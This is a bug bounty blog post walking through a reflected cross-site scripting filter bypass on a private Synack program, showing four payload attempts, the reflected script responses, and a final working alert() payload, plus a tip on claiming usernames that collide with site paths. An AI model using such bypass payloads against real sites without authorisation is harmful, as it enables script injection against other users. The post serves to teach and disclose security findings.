Skip to content

XSSed my way to 1000$

Hello Guys, I recently encountered with an amazing bypass to an endpoint of a program on Synack. Although the bug wasn’t as hard to find, a minimalistic programming knowledge helped me get over 1000$ on this program. As I have discussed the basics of Cross-Site Scripting in my previous blog I’ll move directly to the case study. To know about Cross-Site Scripting read my previous blog here. Please don’t forget to read the Bug Bounty Tip at the end of each post and also like, share and subscribe to the Blog.

Case Study: Reflected XSS filter bypass

The application under test was a three-tier web application – Presentation tier (Front-End/User Interface), Application Tier (Functional Logic) and Data Tier (Databases). As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com.

The application has a login page where users can use the credentials provided to sign-in the application using provided credentials.

After visiting a few pages, A page with a parameter (let’s assume it to be a) whose value was reflected into a script tag, in the response, was found.

Try 1: As the value of parameter a was reflected in the response, the first instinct was to close the script tag after which any payload can be inserted. Turned out that the application rejects < (less than) symbol and filters to &quot; and > to &gt;.As the method didn’t work, a payload had to be designed which didn’t use the symbols “,< and >

Payload: example.com?a=’)}<hello

Response: 500 Error

 

Payload: example.com?a=’)}hello”>

Response:

<script type=”text/javascript”>

            if (somefunction !== something) { something = true; }

            if (false) {

                something.start(‘’)}hello&quot;&gt; ‘}

</script>

Try 2:  As the value of parameter a was reflected inside the script tags, a simple payload of alert(‘XSS’); was entered. Although there wasn’t any issue with the filter on this payload, XSS didn’t fire on the target application.

Payload: example.com?a=hello’)}alert(‘XSS’);

Response:

<script type=”text/javascript”>

            if (somefunction !== something) { something = true; }

            if (false) {

                something.start(‘hello’)}alert(‘XSS’); ‘}

</script>

Try 3: The thing to note was that although the payload had escaped the tag, it didn’t fire. After analysing the code for some time, it was found out that, the if condition where the payload fires are only considered when the condition on the first function:

            if (somefunction !== something) { something = true; }

is false. To bypass this, an alternating condition called the else condition was used. The else condition satisfies the original requirement because if an else was implied to the if(false) condition above, the condition will hold true against the original condition and bypasses the use of if(false) condition where the payload was reflected and not fired.

It was also observed that %0A did get the value of the payload to the new line.

Hence a payload was constructed as 1′)}%0Aelse{%0Aalert(‘XSS’);

Payload: example.com?a= 1′)}%0Aelse{%0Aalert(‘XSS’);

Response:

<script type=”text/javascript”>

            if (somefunction !== something) { something = true; }

            if (false) {

                something.start(‘1’)}

else{

alert(‘XSS’); ‘)

}

</script>

Try 4: The XSS didn’t fire as the parenthesis ‘) was unclosed, hence a payload was then specified as:

Payload: example.com?a= 1′)}%0Aelse{%0Aalert(‘XSS’);(‘

Response:

<script type=”text/javascript”>

            if (somefunction !== something) { something = true; }

            if (false) {

                something.start(‘1’)}

else{

alert(‘XSS’);(‘ ‘)

}

</script>

 

And the XSS box popped up on the webpage:

Final payload used: 1′)}%0Aelse{%0Aalert(‘XSS’);(‘

A bounty of $1100 was given by Synack.

That’s all for this Blog. Hope you liked it.

#BugBountyTip: When signing up, try to claim a username that collides with existing page namespaces, such as /login. This can have unpredictable outcomes.
@EdOverflow

That’s all for today. Please subscribe to my blog. Connect with me on LinkedIn.

Gaurav Narwani

10 Replies to “XSSed my way to 1000$”

  1. Enjoyed reading it ! Keep it up 🙂 you have my full support bro 😀

  2. Hello gaurav,
    I am preparing for synack red team. And I also report some vulnerability to openbugbounty as well as some other bounty programs. Can you guide me what is scenario of synack interview.

Comments are closed.